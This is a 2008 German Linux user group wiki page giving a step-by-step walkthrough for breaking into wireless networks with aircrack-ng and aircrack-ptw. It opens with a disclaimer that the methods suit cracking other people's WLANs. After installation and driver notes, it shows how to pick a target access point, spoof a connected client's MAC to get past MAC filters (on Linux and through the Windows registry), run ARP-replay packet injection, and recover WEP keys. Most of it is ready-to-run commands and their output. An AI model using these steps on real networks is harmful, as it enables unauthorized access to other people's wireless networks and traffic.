DISCLAIMER: DIE BESCHRIEBENEN VERFAHREN EIGNEN SICH U.A. DAZU, FREMDE WLAN'S ZU KNACKEN.

ICH DISTANZIERE MICH VON DIESER ANWENDUNG IN ALLER DEUTLICHKEIT!

Alle angegebenen Netzwerknamen und MAC's sind frei erfunden Übereinstimmungen sind REIN zufällig

Installation

aircrack-ng und aircrack-ptw

(K)Ubuntu-generic und Debian

Das aircrack-ng Projekt liegt vor-kompiliert bereits vor:

# apt-get install aircrack-ng 

Die neuere Version des [http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/ aircrack-ptw] Programms ist nur als Source verfügbar. Es wird zum schnellen finden von WEP Passwörtern benötigt. Manuelle Installation:

$ wget http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz
$ tar -xvvzf aircrack-ptw-1.0.0.tar.gz
$ cd aircrack-ptw-1.0.0/
# apt-get install libpcap0.8-dev
$ make
# mv aircrack-ptw /usr/bin 

{i} Das "move" Kommando ist nicht zwingend notwendig. Das Programm lässt sich auch problemlos im Userspace ausführen:

$ ./aircrack-ptw 

SUSE

aircrack suite installieren

# yast -i aircrack-ng

Die Installation der ptw Version sollte genauso wie unter Ubuntu funktionieren. Dabei muss man sich nur nochmal um das Paket libpcap0.8-dev kümmern...

Treiber für monitor mode und injection

Prinzipiell benötigt man eine Wlan Karte mit:

Einen guten Ruf haben Karten von Orinocco und Atheros. Leider lassen sich die Chipsatzhersteller bei billigen Karten oft nur schwer finden. siehe dazu: http://www.aircrack-ng.org/doku.php?id=install_drivers&DokuWiki=48345c3bbf4dd35022cb04f6dc4b1a36 Bitte Probleme und Lösungen für andere Karten auch posten.

ipw3945 & iwl3945

Bei ipw3945 handelt es sich um einen Intel Chipsatz, der vornehmlich in der Centrino Platform vor "Santa Rosa" verbaut wurde. BR Dannach wurde auf Draft-N Wlan umgestellt. Ab diesem Zeitpunkt kommt ipw4965 zum Einsatz. BR Bis Kernel 2.6.22 wurde ein altes Subsystem (ieee80211) verwendet, auf dem der monitor mode, aber keine injection liefen. Daraufhin wurde unter dem Codename ipwraw ein Treiber "zusammen-gehackt" der die fehlende injection - sehr unzuverlässig - bereitstellte. Dieser Treiber war jedoch nicht für die normal Nutzung praktikabel, er war optimiert um sogenannte raw Packete zu versenden. Allen Leuten mit einem Kernel unter 2.6.22 rate ich daher zu einem Update auf einen aktuellen Kernel und damit auf das neue Subsystem. BR Ab besagter Version 2.6.22 wurde ein neuer Wlan Stack (mac80211) migriert, auf dem ein neuer Treiber für die ipw3945 lief. Der Name iwl3945. Dieser Treiber unterstützt monitor mode UND injection - die Lösung der Probleme des alten ipw3945 / ipraw. BR BR {i} aktuelle Kernel Version anzeigen:

$ uname -r

Das compat-wireless Paket stellt per Patch die neusten Features des mac80211 Stacks bereit.

# apt-get install linux-headers-generic build-essential
$ wget http://linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2.6.tar.bz2
$ tar -xjf compat-wireless-2.6.tar.bz2
$ cd compat-wireless-*
$ make
# make install && make load

Zum deinstallieren der Erweiterung

# make unload
# make uninstall 

<!> ACHTUNG NUR BIS HIER GETESTET!!! <!> BR

Monitor Modus starten:

airmon-ng start wlan0 

Erstellt den Monitor-device “mon0” Bei Nutzung von airodump-ng ist folgendes zu beachten:

airodump-ng -c <channel>,<channel> mon0 

Durch einen Bug muss der Channel 2mal gesetzt werden. BR Device ist der eben erstellte mon0 Monitor.

Netzwerke finden

<!> Bitte alle Befehle mit root-Rechten ausführen.

$ su

oder

$ sudo -s

Für dem gesamten Ablauf wird der Netzwerkadapter genutzt. Da er je nach Konfiguration und Hardware.BR Mein Netzwerkadapter heisst wlan0. Bitte passend ersetzen:

# ETH="wlan0"

Während des gesamten Geschehens soll das Programm airodump-ng laufen.BR Vor dem Start muss man den sogenannten Monitor Mode beenden:

# airmon-ng $ETH stop

Nun lässt sich airodump-ng problemlos starten:

# airodump-ng $ETH

Nun erhält man 2 Listen. BR

Die obere Liste stellt alle AP - also alle Basistationen - dar. BR In 99% ist ein solcher AP auch das Angriffsziel.BR Nachdem man sich das richtige Netzwerk ausgesucht hat, werden folgende Daten eingelesen:

# BSSID="00:12:A9:0C:F8:45" //MAC Adresse des Ziels
# ESSID="WLAN-D43251" //Netzwerkname
# CHANNEL="11" //Broadcast Channel auf dem die AP funkt

folgende Daten werden zudem angezeigt:

Name

Beschreibung

Beacons

geben die Qualität der Verbindung an: Je mehr desto besser

PWR

Signalstärke (wird nicht von allen Karten unterstützt)

#Data

geben die Anzahl der aufgenommenen schwachen IV's an. Diese Packete machen ein WEP Netz angreibar. Mit dem in aircrack-ptw implementierten Algorithmus lassen sich WEP Passwörter mit ca. 30.000 #Data Packeten berechnen

ENC

Art der Verschlüsselung (OPN/WEP/WPA/WPA2)

MB

verwandter Funkstandart a/b/g/n g=54MB

In der unteren Liste sind alle Clients aufgeführt, die in irgendeiner Form mit einer der AP's verbunden sind. BR Fall das Netzwerk einen MAC Filter nutzt, kann man dort vllt einen Client finden seine MAC spoofen. BR Für WEP Attacken bedeuten viele Clients gleich viel Traffic und das wiederum ermöglicht es einen passiven Angriff auszuführen. BR Für WPA Attacken ist es essentiell, dass Clients verbunden sind, sonst ist ein Angriff nahezu ausgeschlossen.BR

Angriffsszenarien

Nun sind alle Daten über das WLAN bekannt. BR Je nach Verschlüsselung / Schutz gibt es unterschiedliche Vorgehensweisen: BR

Schutz

Vorgehen

MAC Filter

MAC Spoofen

WEP

Injection oder reines mitschneiden

WPA

4-Way-Handshake abfangen und knacken

WPA2 und VPN

kein praktischer Angriff bekannt

MAC Spoofing

MAC Filter werden immer noch eingesetzt, obwohl es sogar schon Win Tools gibt mit denen man MAC Adressen ändern kann. BR Normalerweise ist die MAC der Hardware (auch BSSID genannt) in einem ROM auf der jeweiligen Karte unveränderlich abgelegt. BR Allerdings ist es möglich mit Software (Linux Bordmittel) die nach außen gegebene MAC zu verändern (Spoofing). BR BR Für das Spoofing braucht man eine zugelassene MAC Adresse. Per

# airodump-ng $ETH

lässt sich einfach Festellen ob und welche Clients mit einer AP verbunden sind.BR Client / Spoofing MAC speichern

# SPOOF="00:19:34:F4:D2:33" // MAC des verbunden Clients

Ändern der eigenen MAC

# ifconfig $ETH down
# ifconfig $ETH hw ether $SPOOF
# ifconfig $ETH up

Bei Neustart wird die Orginal-MAC zurückgesetzt.BR

WEP

Dieser Angriff ist nun mittlerweile seit einem Jahr für die breite Öffentlichkeit zugänglich.BR Normalerweise hört eine WLAN Karte nur auf Pakete, die auf sie adressiert sind.BR Der Monitor-Mode sorgt dafür, dass alle Packete mitgehört werden können die auf einem bestimmten Channel gesendet werden BR Den Wlan Adapter anhalten:

airmon-ng stop $ETH

$ iwconfig sollte nun keine Wlan Erweiterungen mehr erkennen:

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.

Neustarten des Wlan Adapters im Monitor Mode:

# airmon-ng start $ETH $CHANNEL

Nun muss airodump den Verkehr auf dem Channel aufzeichen:

# airodump-ng -c $CHANNEL --bssid $BSSID -w output $ETH

output ist dabei die Datei, in die alle aufgenommenen Pakete gespeichert werden.BR BR Für die folgenden Schritte ist es extrem wichtig, dass der MAC Filter ausgeschaltet, bzw. gespooft ist.BR Nun startet man die Injection, um die Paketanzahl zu steigern:

# aireplay-ng -1 0 -e $ESSID -a $BSSID -h $SPOOF $ETH

Anstatt $SPOOF kann man auch die eigene MAC nehmen, wenn kein MAC Filter existiert. Wenn alles geklappt hat sollte die Ausgabe wie folgt aussehen:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

Nun kann der Spass losgehen. aireplay wird nun gefakte Authentisierungsanfragen abschicken, um die AP ein bisschen zum senden von schwachen IV zu animieren:

# aireplay-ng -3 -b $BSSID -h $SPOOF $ETH

Nun sollte etwas in der Art ausgegeben werden:

 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

Wenn ca 30.000 #Data von airodump-ng angezeigt werden kann man die Programme schließen und aircrack starten:

# aircrack-ptw -b $BSSID output*.cap

Je mehr Pakete man hat desto schneller / erfolgreicher ist dieser Vorgang. BR Der Crack-Vorgang braucht viel Rechenleistung & RAM. Im Zweifelsfall kann man das auch auf einem anderen Rechner machen, falls man dem Netbook-Wahn erlegen ist. BR Nach mehr oder weniger kurzer zeit sollte ein Passwort ausgegeben werden. DONE.

Anhang

weitere Programme

Programmname

Funktion

kismet

textbasierter Wlan - Scanner

wireshark

Netzwerk-Sniffer, mit sehr guter Filterfunktion für definierte Packete.

nmap

kleiner, schneller Portscanner um sich im Netzwerk zu Orientieren

ping

testen ob ein server ereichbar ist

iwconfig

Wlan Hardware einrichten und beobachten

ophcrack

GUI für Rainbow Tables - relativ schlecht für WPA interessant...

Anmerkung für M$ Windows User

Netzwerke finden

Es gibt ein nettes Tool mit dem man Netzwerke unter Windows besser finden kann: BR http://www.netstumbler.com/downloads/ BR BR kleines HowTo (Englisch): BR

WEP Angriff

aircrack-ptw lässt sich mit [http://www.twistedethics.com/2007/06/11/cracking-wep-with-aircrack-ptw-in-windows-with-airpcap-and-cain/ Modifikationen] auch unter Windows installieren... BR Probleme treten bei den Treibern auf. Es wird prinzipiell keine Injection unterstützt. BR Überhaupt gibt es nur wenig Karten / Treiber die überhaupt den Monitor - Mode bereitstellen. BR BR

MAC Ändern

WINDOWS - R
rededit 

öffnen:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}] 

ausklappen und dort nach

DriverDesc 

suchen bis die gewünschte Netzwerkkarte auftaucht (Unterordner 0000 - 0xxx) BR dann eine neue "Zeichenfolge" mit

NetworkAddress  

hinzufügen BR und als Wert die MAC Adresse (ohne Bindestriche) eingeben, BR dann die LAN Verbindung deaktivieren und wieder starten.

$ ipconfig /all 

Ist die neue MAC wirksam? BR <!> an alle Script-Kiddy's: Keine MAC's doppelt nutzen, das führt zu Netzwerkproblemen...

LugMosbach/Projekte/aircrack (zuletzt geändert am 2008-11-12 22:01:50 durch PitGranzow)